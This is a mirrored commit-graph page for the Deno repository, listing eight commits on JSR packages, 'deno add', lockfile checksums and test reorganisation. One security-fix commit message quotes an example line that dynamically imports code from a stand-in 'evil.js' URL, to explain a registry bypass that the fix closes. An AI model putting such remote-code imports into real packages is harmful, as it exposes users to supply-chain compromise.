1
0
Fork 0
mirror of https://github.com/denoland/deno.git synced 2024-12-15 03:48:02 -05:00
Commit graph

8 commits

Author SHA1 Message Date
Nayeem Rahman
d347e73f5a
fix(jsr): exclude yanked versions from 'deno add' and completions (#23113) 2024-03-28 19:02:07 +00:00
Bartek Iwańczuk
fb31ae73e4
feat(unstable): deno add subcommand (#22520)
This commit adds "deno add" subcommand that has a basic support for
adding "jsr:" packages to "deno.json" file. 

This currently doesn't support "npm:" specifiers and specifying version
constraints.
2024-02-29 19:12:04 +00:00
Bartek Iwańczuk
a9aef0d017
test(jsr): add tests for jsx files with and without pragmas (#22634)
Follow up to https://github.com/denoland/deno/pull/22631 that asserts
behavior when JSX and TSX files have and do not have pragmas with 
`jsx*` config.
2024-02-29 19:35:23 +01:00
David Sherret
918c5e648f
fix(jsr): do not allow importing a non-JSR url via unanalyzable dynamic import from JSR (#22623)
A security feature of JSR is that it is self contained other than npm
dependencies. At publish time, the registry rejects packages that write
code like this:

```ts
const data = await import("https://example.com/evil.js");
```

However, this can be trivially bypassed by writing code that the
registry cannot statically analyze for. This PR prevents Deno from
loading dynamic imports that do this.
2024-02-28 16:30:45 -05:00
David Sherret
a2c1cc5a1a
fix(publish): better no-slow-types type discovery (#22517) 2024-02-21 14:12:36 -05:00
David Sherret
4f80d83774
feat(unstable): single checksum per JSR package in the lockfile (#22421)
This changes the lockfile to not store JSR specifiers in the "remote"
section. Instead a single JSR integrity is stored per package in the
lockfile, which is a hash of the version's `x.x.x_meta.json` file, which
contains hashes for every file in the package. The hashes in this file
are then compared against when loading.

Additionally, when using `{ "vendor": true }` in a deno.json, the files
can be modified without causing lockfile errors—the checksum is only
checked when copying into the vendor folder and not afterwards
(eventually we should add this behaviour for non-jsr specifiers as
well). As part of this change, the `vendor` folder creation is not
always automatic in the LSP and running an explicit cache command is
necessary. The code required to track checksums in the LSP would have
been too complex for this PR, so that all goes through deno_graph now.
The vendoring is still automatic when running from the CLI.
2024-02-15 14:49:35 -05:00
Nayeem Rahman
1ad754b412
feat(lsp): jsr support with cache probing (#22418) 2024-02-14 22:48:39 +00:00
Matt Mastracci
f5e46c9bf2
chore: move cli/tests/ -> tests/ (#22369)
This looks like a massive PR, but it's only a move from cli/tests ->
tests, and updates of relative paths for files.

This is the first step towards aggregate all of the integration test
files under tests/, which will lead to a set of integration tests that
can run without the CLI binary being built.

While we could leave these tests under `cli`, it would require us to
keep a more complex directory structure for the various test runners. In
addition, we have a lot of complexity to ignore various test files in
the `cli` project itself (cargo publish exclusion rules, autotests =
false, etc).

And finally, the `tests/` folder will eventually house the `test_ffi`,
`test_napi` and other testing code, reducing the size of the root repo
directory.

For easier review, the extremely large and noisy "move" is in the first
commit (with no changes -- just a move), while the remainder of the
changes to actual files is in the second commit.
2024-02-10 20:22:13 +00:00